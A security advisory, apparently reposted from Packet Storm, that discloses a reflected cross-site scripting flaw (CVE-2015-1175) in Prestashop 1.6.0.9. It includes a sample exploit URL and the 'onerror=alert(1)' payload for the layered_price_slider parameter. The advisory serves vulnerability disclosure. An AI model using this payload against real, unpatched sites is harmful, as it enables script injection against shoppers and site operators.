Prestashop 1.6.0.9 Cross Site Scripting

2015-01-20T00:00:00
ID PACKETSTORM:130026
Type packetstorm
Reporter Sudhanshu Chauhan
Modified 2015-01-20T00:00:00

Description

                                        
                                            `CVE-2015-1175-xss-prestashop  
  
Information  
——————–  
Advisory by Octogence.  
Name: Reflected XSS Vulnerability in prestashop ecommerce software  
Affected Software : Prestashop  
Affected Versions: 1.6.0.9 and possibly below  
Vendor Homepage : https://www.prestashop.com/  
  
  
Vulnerability Type : Cross-site Scripting  
Severity : High  
CVE ID: CVE-2015-1175  
  
Impact  
——  
An attacker can craft a URL with malicious JavaScript code which  
executes in the browser.  
  
Technical Details  
—————–  
Sample URL:  
  
http://localhost/prestashop/prestashop/modules/blocklayered/blocklayered-ajax.php?layered_id_feature_20=20_7&id_category_layered=8&layered_price_slider=16_532f363<img%20src%3da%20onerror%3dalert(1)>9c032&orderby=position&orderway=asctrue&_=1420314938300  
  
Parameter:  
layered_price_slider  
  
Sample Payload:  
<img src=a onerror=alert(1)>  
  
For more information on cross-site scripting vulnerabilities read the  
following article:  
  
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)  
  
Advisory Timeline (mm/dd/yyyy)  
——————–  
01/07/2015 – Reported  
01/12/2015 – Vulnerability Fixed  
01/18/2015 – Advisory Released  
  
http://octogence.com/advisories/cve-2015-1175-xss-prestashop/  
  
  
  
  
Regards  
Sudhanshu  
  
Octogence Tech Solutions  
Noida, India  
Mobile | +91-9971658929  
Website| www.octogence.com  
`